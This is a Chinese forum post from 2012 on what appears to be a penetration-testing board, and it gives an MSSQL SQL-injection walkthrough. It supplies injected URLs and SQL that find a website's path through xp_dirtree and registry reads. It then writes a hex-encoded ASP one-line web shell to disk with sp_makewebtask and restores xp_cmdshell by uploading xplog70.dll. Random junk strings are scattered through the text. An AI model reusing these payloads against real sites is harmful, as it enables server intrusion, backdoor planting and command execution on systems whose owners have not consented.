中国网络渗透测试联盟

标题: MSsqlL注入取得网站路径最好的方法 [打印本页]
作者: admin    时间: 2012-9-13 17:20
标题: MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'& w' e9 o+ X/ K+ Y
假设我们在test里有两个文件夹test1和test2在test1里又有test3
) i+ [6 n0 O0 ?# Q$ C: v结果显示& i5 I* L. M& j2 r8 i

! G7 {# g# J0 ssubdirectory depth
* W/ G% k: v' M: P) k7 Etest1 1
8 ]( G; e  J6 Q4 e# ytest3 2, e; F' `( D' a4 z
test2 1
% W( f$ w" y$ c' [5 I/ C! W8 b4 s" U0 x# M' L
哈哈发现没有那个depth就是目录的级数6 z) R9 b) |( P8 o! Q
ok了,知道怎么办了吧( X7 w" b4 X2 a' |# n/ s3 |& s+ B- B
4 E  p8 e/ I3 p  G' B8 A/ P
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- & M3 @6 o# L( `) u. b6 b3 N
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- 4 S0 s' s" q3 L: ~6 E. P; g
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
) s9 K7 r1 t+ v3 n  `  ]
5 p) Y$ ~) P$ B. e' G7 V4 c只要加上id=1,就是第一级目录 。- m/ [5 ~1 ?7 @& e5 `
, E2 ^; b7 C" M6 E# u
. Y& a0 Q9 s- ]9 c
通过注册表读网站路径:
0 r/ F0 d  m6 ]2 J) o& I" S% O7 X0 ]- G; b5 U& @3 E8 |+ Q, T2 p
1.;create table [dbo].[cyfd] ([gyfd][char](255));9 p# V% V3 E+ {( q2 r
" m4 q6 j4 v+ v: k, M; ~7 ]' L
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
& _( M3 z# F* \2 M1 Did=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--8 X+ O! p  F( O$ x

0 ^7 c$ r) ]; q3.and 1=(select count(*) from 临时表 where 临时字段名>1)
# O' M+ i$ D: A! v- d9 Oand 1=(select count(*) from cyfd where gyfd > 1)   p( B  k1 z# |( c( k
这样IE报错,就把刚才插进去的Web路径的值报出来了
; ~0 \/ J7 D6 c" ?4 ]. O
. a# t$ H& a* m& a4.drop table cyfd;-- 删除临时表$ f4 B6 b1 A& j' H

4 b% {% A6 f$ b7 E  ^2 N获得webshell方法:% Y# D  l' D2 @% A6 a, `
1.create table cmd (a image)-- \**cmd是创建的临时表
# P& Z+ f* c0 A2 g7 e
" L0 ]1 g/ D  t4 d1 L! Y4 l9 J2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话" ^/ D5 W! F/ ~% m  h( S
1 B; {2 M$ |1 `& D! _
% W2 Y  X  e( ^5 j, J# F
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'! v5 G  `8 }% p6 p% L1 \0 z
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'" ]3 g2 B+ _6 S/ O- r: B

! n5 l9 m/ @$ E/ L* X7 w4.drop table cmd;-- 删除cmd临时表
6 u# D2 ]8 a, t
3 e: B4 }! @/ \恢复xp_cmdshell方法之一:
8 m/ ?4 S) j8 ]9 m1 |我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
  R+ C% T) I. ^, V) d  J2 Vhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'8 }$ [2 X  w  _1 Y3 Y* s9 `
恢复,支持绝对路径的恢复哦。:): U  S) T6 q, S0 [# z8 i




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2